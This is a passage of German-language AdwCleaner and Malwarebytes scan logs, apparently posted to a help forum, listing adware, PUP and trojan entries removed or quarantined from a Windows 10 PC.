[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\land.pckeeper.software
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pckeeper.software
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www-searching.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\coupontime.co
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\land.pckeeper.software
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pckeeper.software
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.coupontime00.coupontime.co
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www-searching.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\coupontime.co
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\land.pckeeper.software
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pckeeper.software
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www-searching.com
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce [Wd]
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gplyra]
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gplyra]
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [AppTrailers]
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [MyMemory]
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [BestCleaner]
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Internet Explorer\SEARCHSCOPES\IELNKSRCH
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting
[#] Schlüssel mit Neustart gelöscht: HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\IELNKSRCH
[-] Schlüssel gelöscht: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Wert gelöscht: HKLM\SYSTEM\CurrentControlSet\Services\Themes [DependOnService]
[-] Schlüssel gelöscht: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Zaamla.exe


***** [ Browser ] *****

[-] Firefox Einstellungen bereinigt: "browser.newtab.url" -  "hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h2czbcnbl1au,e757b544-b7e3-4f69-a055-fbd9a7e08b83,"
[-] Firefox Einstellungen bereinigt: "browser.search.defaultenginename" -  "youndoo"
[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.hp" -  "hxxp://www.youndoo.com/?z=7eedf74bfaa17e21a2df247gdzabeq8t2c5zceeo2o&from=amz&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&type=hp"
[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.sp" -  "hxxp://www.youndoo.com/search/?from=amz&q={searchTerms}&type=sp&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&z=7eedf74bfaa17e21a2df247gdzabeq8t2c5zceeo2o"
[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.url" -  "hxxp://www.youndoo.com/search/?from=amz&q={searchTerms}&type=sp&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&z=7eedf74bfaa17e21a2df247gdzabeq8t2c5zceeo2o"
[-] Firefox Einstellungen bereinigt: "browser.search.selectedEngine" -  "youndoo"
[-] Firefox Einstellungen bereinigt: "browser.startup.homepage" -  "hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h2czbcnbl1au,e757b544-b7e3-4f69-a055-fbd9a7e08b83,"
[-] Firefox Einstellungen bereinigt: "keyword.URL" -  "hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown"


*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [18716 Bytes] - [13/02/2017 20:38:32]
C:\AdwCleaner\AdwCleaner[S0].txt - [18118 Bytes] - [13/02/2017 20:37:52]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [18864 Bytes] ##########

--- --- ---

Malwarebytes

Zitat:

Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 13.02.17
Scan-Zeit: 20:43
Protokolldatei: mbam.txt
Administrator: Ja

-Softwaredaten-
Version: 3.0.6.1469
Komponentenversion: 1.0.50
Version des Aktualisierungspakets: 1.0.1252
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Barbara-PC\Barbara

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 407796
Abgelaufene Zeit: 1 Min., 1 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 3
PUP.Optional.StartGo123, C:\WINDOWS\SYSTEM32\NETUTILS2016.DLL, In Quarantäne, [861], [318108],1.0.1252
Adware.Elex.Generic, C:\PROGRAMDATA\108L42A89C7603\108L42A89C7603.DLL, In Quarantäne, [2145], [363783],1.0.1252
Adware.Elex, C:\PROGRAM FILES (X86)\ATIKATIONBOGOT SYSTEM\LOCAL64SPL.DLL, In Quarantäne, [1032], [370024],1.0.1252

Registrierungsschlüssel: 14
PUP.Optional.StartGo123, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NetUtils2016, In Quarantäne, [861], [325509],1.0.1252
PUP.Optional.OneSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{07D082A4-BB0D-42C3-8BB9-5E3E9CD9005F}, In Quarantäne, [578], [258705],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0CD166F7-D57D-4AB4-8CE2-07FD0953AD42}, In Quarantäne, [1225], [258707],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{438725D4-69D8-4445-B2DA-9A70D2F233ED}, In Quarantäne, [62], [258427],1.0.1252
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{59976EE9-B675-4313-9C06-33B5859616D7}, In Quarantäne, [434], [258228],1.0.1252
PUP.Optional.OneSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5D60C962-36C5-4A56-A06A-6FD1172E85A4}, In Quarantäne, [578], [258705],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7432028A-63DE-4A1B-949F-2198F84DED64}, In Quarantäne, [62], [258426],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{81E58287-3D1D-4B96-8E11-D031A50025F6}, In Quarantäne, [1225], [258707],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{94874025-16A1-42F6-BF7D-4DDF56156E6C}, In Quarantäne, [62], [258427],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C66406B3-BC53-4127-ACE4-04BF99EB50C5}, In Quarantäne, [1225], [258706],1.0.1252
Adware.ConvertAd.Generic, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\xeduqivo, In Quarantäne, [2908], [364495],1.0.1252
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a, In Quarantäne, [434], [186804],1.0.1252
PUP.Optional.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\gplyra, In Quarantäne, [253], [317317],1.0.1252
Adware.Sasquor.SPL, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\PRINT\PROVIDERS\pfqv62f8, In Quarantäne, [2086], [339986],1.0.1252

Registrierungswert: 22
Adware.Tuto4PC, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|LAMMPX75X6, In Quarantäne, [2320], [350732],1.0.1252
Trojan.Agent.Generic, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|x5o3Yv2CQw.exe, In Quarantäne, [820], [369948],1.0.1252
Adware.Tuto4PC, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|XN55R0BYZD, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|OMEWPRODUCT_EGD3B, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|JG5BHCSAVC, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|JLAWFPN14I, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|GWH9N93A6U, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC.Generic, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|zC6b23GTAV.exe, In Quarantäne, [2466], [365964],1.0.1252
PUP.Optional.OneSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{07D082A4-BB0D-42C3-8BB9-5E3E9CD9005F}|PATH, In Quarantäne, [578], [258705],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0CD166F7-D57D-4AB4-8CE2-07FD0953AD42}|PATH, In Quarantäne, [1225], [258707],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{438725D4-69D8-4445-B2DA-9A70D2F233ED}|PATH, In Quarantäne, [62], [258427],1.0.1252
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{59976EE9-B675-4313-9C06-33B5859616D7}|PATH, In Quarantäne, [434], [258228],1.0.1252
PUP.Optional.OneSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5D60C962-36C5-4A56-A06A-6FD1172E85A4}|PATH, In Quarantäne, [578], [258705],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7432028A-63DE-4A1B-949F-2198F84DED64}|PATH, In Quarantäne, [62], [258426],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{81E58287-3D1D-4B96-8E11-D031A50025F6}|PATH, In Quarantäne, [1225], [258707],1.0.1252
PUP.Optional.PCCleanPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{94874025-16A1-42F6-BF7D-4DDF56156E6C}|PATH, In Quarantäne, [62], [258427],1.0.1252
PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C66406B3-BC53-4127-ACE4-04BF99EB50C5}|PATH, In Quarantäne, [1225], [258706],1.0.1252
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, In Quarantäne, [96], [-1],0.0.0
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, In Quarantäne, [96], [-1],0.0.0
Adware.ConvertAd.Generic, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\xeduqivo|IMAGEPATH, In Quarantäne, [2908], [364495],1.0.1252
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, In Quarantäne, [96], [259988],1.0.1252
Adware.Sasquor.SPL, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\PRINT\PROVIDERS\pfqv62f8|NAME, In Quarantäne, [2086], [339986],1.0.1252

Registrierungsdaten: 1
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Ersetzt, [96], [293486],1.0.1252

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 5
Adware.Tuto4PC.Generic, C:\USERS\BARBARA\APPDATA\ROAMING\{E96-E1-84-C5451-AD240-9CEA-AA139}, In Quarantäne, [2466], [365964],1.0.1252
Adware.Elex.Generic, C:\PROGRAM FILES (X86)\ATIKATIONBOGOT SYSTEM, In Quarantäne, [2145], [358305],1.0.1252
PUP.Optional.Linkury, C:\WINDOWS\TEMP\SMARTBAR, In Quarantäne, [397], [259312],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\PROGRAM FILES (X86)\COMMON FILES\Y-OVETIP, In Quarantäne, [96], [302562],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\PROGRAM FILES (X86)\COMMON FILES\FIXZAP, In Quarantäne, [96], [302566],1.0.1252

Datei: 87
PUP.Optional.StartGo123, C:\WINDOWS\SYSTEM32\NETUTILS2016.DLL, In Quarantäne, [861], [318108],1.0.1252
Adware.Elex.Generic, C:\PROGRAMDATA\108L42A89C7603\108L42A89C7603.DLL, In Quarantäne, [2145], [363783],1.0.1252
Adware.Elex, C:\PROGRAM FILES (X86)\ATIKATIONBOGOT SYSTEM\LOCAL64SPL.DLL, In Quarantäne, [1032], [370024],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\WR5TG73LV7\WR5TG73LV.EXE, In Quarantäne, [2320], [350732],1.0.1252
Trojan.Agent.Generic, C:\USERS\BARBARA\APPDATA\ROAMING\{E96-E1-84-C5451-AD240-9CEA-AA139}\X5O3YV2CQW.EXE, In Quarantäne, [820], [369948],1.0.1252
PUP.Optional.StartGo123, C:\WINDOWS\SYSTEM32\DRIVERS\NETUTILS2016.SYS, In Quarantäne, [861], [325509],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\P3ZUK80JKY\P3ZUK80JK.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES (X86)\BECLEANER\9J3PGU1187X4TMA.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\IQ50062YNB\IQ50062YN.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES (X86)\BECLEANER\KDGFQ.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\8K5F5GX6AI\8K5F5GX6A.EXE, In Quarantäne, [2320], [350732],1.0.1252
PUP.Optional.LogicHandler, C:\USERS\BARBARA\APPDATA\ROAMING\BIOITY.BIN, In Quarantäne, [4579], [24306],1.0.1252
PUP.Optional.Linkury, C:\USERS\BARBARA\APPDATA\ROAMING\SONZOOLUX.BIN, In Quarantäne, [397], [331415],1.0.1252
PUP.Optional.Linkury.Gen, C:\USERS\BARBARA\APPDATA\ROAMING\FLEX-FIX.TST, In Quarantäne, [19882], [261636],1.0.1252
PUP.Optional.Linkury, C:\USERS\BARBARA\APPDATA\ROAMING\UNINSTALL_TEMP.ICO, In Quarantäne, [397], [258093],1.0.1252
PUP.Optional.Linkury.Gen, C:\USERS\BARBARA\APPDATA\ROAMING\FRESH-TOM.TST, In Quarantäne, [19882], [261636],1.0.1252
Trojan.Agent.WR, C:\USERS\BARBARA\APPDATA\ROAMING\FRESH-TOM.EXE, In Quarantäne, [3146], [368063],1.0.1252
Trojan.Agent.WR, C:\USERS\BARBARA\APPDATA\ROAMING\FLEX-FIX.EXE, In Quarantäne, [3146], [368063],1.0.1252
PUP.Optional.LogicHandler, C:\USERS\BARBARA\APPDATA\ROAMING\TONEX.BIN, In Quarantäne, [4579], [24306],1.0.1252
PUP.Optional.Linkury, C:\USERS\BARBARA\APPDATA\ROAMING\SINGLEITY.BIN, In Quarantäne, [397], [331415],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\PREFS.JS, Ersetzt, [418], [324486],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\SEARCHPLUGINS\PFQV62F8.XML, In Quarantäne, [765], [324489],1.0.1252
PUP.Optional.Trotux, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\HOVELY.DEFAULT\SEARCHPLUGINS\PFQV62F8.XML, In Quarantäne, [418], [324483],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\8K5F5GX6AI\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\REORADOM.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
Adware.Tuto4PC.Generic, C:\USERS\BARBARA\APPDATA\ROAMING\{E96-E1-84-C5451-AD240-9CEA-AA139}\ZC6B23GTAV.EXE.CONFIG, In Quarantäne, [2466], [365964],1.0.1252
Adware.Tuto4PC.Generic, C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\x5o3Yv2CQw.exe.config, In Quarantäne, [2466], [365964],1.0.1252
Adware.Tuto4PC.Generic, C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\zC6b23GTAV.exe, In Quarantäne, [2466], [365964],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\PREFS.JS, Ersetzt, [765], [324487],1.0.1252
Adware.Elex.Generic, C:\PROGRAM FILES (X86)\ATIKATIONBOGOT SYSTEM\LOCAL64SPL.DLL.INI, In Quarantäne, [2145], [358305],1.0.1252
PUP.Optional.Youndoo, C:\USERS\BARBARA\APPDATA\ROAMING\PROFILES\THERJOYCLOVERSP.DEFAULT\SEARCHPLUGINS\PFQV62F8.XML, In Quarantäne, [765], [324489],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\P3ZUK80JKY\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\IQ50062YNB\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\WR5TG73LV7\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\XPQ0UG79CA\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES\PDR238V39I\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\PROGRAM FILES (X86)\BECLEANER\UNINSTALLER.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Elex, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\GA1BE.TMP.EXE, In Quarantäne, [1032], [369375],1.0.1252
